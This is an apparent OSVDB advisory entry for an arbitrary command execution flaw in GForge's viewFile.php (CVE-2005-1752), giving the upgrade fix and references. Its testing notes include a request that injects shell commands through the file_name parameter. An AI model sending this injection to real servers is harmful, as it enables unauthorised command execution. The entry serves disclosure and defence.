GForge viewFile.php file_name Parameter Arbitrary Command Execution

2005-05-24T04:21:03
ID OSVDB:16930
Type osvdb
Reporter OSVDB
Modified 2005-05-24T04:21:03

Description

Solution Description

Upgrade to version 3.1-30 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

/scm/viewFile.php?group_id=11&file_name=%0Auname%20-a;id;w%0a

References:

Vendor URL: http://gforge.org/ Secunia Advisory ID:13845 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-05/0268.html CVE-2005-1752 Bugtraq ID: 13716